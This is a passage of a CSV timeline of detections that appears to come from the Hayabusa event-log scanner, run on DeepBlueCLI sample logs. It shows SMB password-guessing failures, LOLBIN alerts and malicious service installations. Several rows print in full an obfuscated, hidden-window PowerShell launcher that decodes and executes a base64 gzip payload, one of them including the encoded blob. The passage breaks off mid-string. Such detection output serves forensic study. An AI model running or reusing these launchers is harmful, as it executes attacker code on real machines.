+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oEAEOi0TsSRVPlz4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: USfEwKkH8OUADVds | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y0jg1i6tDiInd10i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv2jRzrgoP6lJdAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LmuAXUwSkhR3tSRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zy4Fkpvcrlmp9AES | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 51ipUXvrRh0CPH1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TB15XKzVJwIyjqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i1F6muFPBlPyHPbR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XNXwYS73RElHozUo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ft1MLPJISeq0bMsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.845 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8kbFOwQiCyRVMDV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ToPzuDEmXN1fjIcS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pKF1QKEuTXIGnrx2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fyHpo6pX8TEo6ttv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uYqEt90yr8B3rK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LKkrM0slVn0CKHw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyJ82cfaddnc8c6D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KJRw0S82SupmuS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4lSo9BMWdcPLfLb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XreSLg472qhJw0R3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIJcQJKLmnjrE2T9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.309 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlddo3GCTEIkFyi9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hxiZoB5mHR2tGUFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fpEbpiox2Q3Qf8av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:54:20.959 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x438 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:55:28.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x338 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:55:39.187 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x658 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 02:43:48.712 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\8xpeyiyp.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf4 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 02:43:48.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ud-vxj7k.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x840 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 02:43:49.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gsxogihi.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x2f8 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 02:43:49.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" 
/noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\owummvtl.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xe48 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 02:43:49.183 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 02:43:49.891 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xfb0 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 02:43:49.912 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x184 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:36:09.237 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:36:09.334 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:36:10.592 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuR
K3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXG
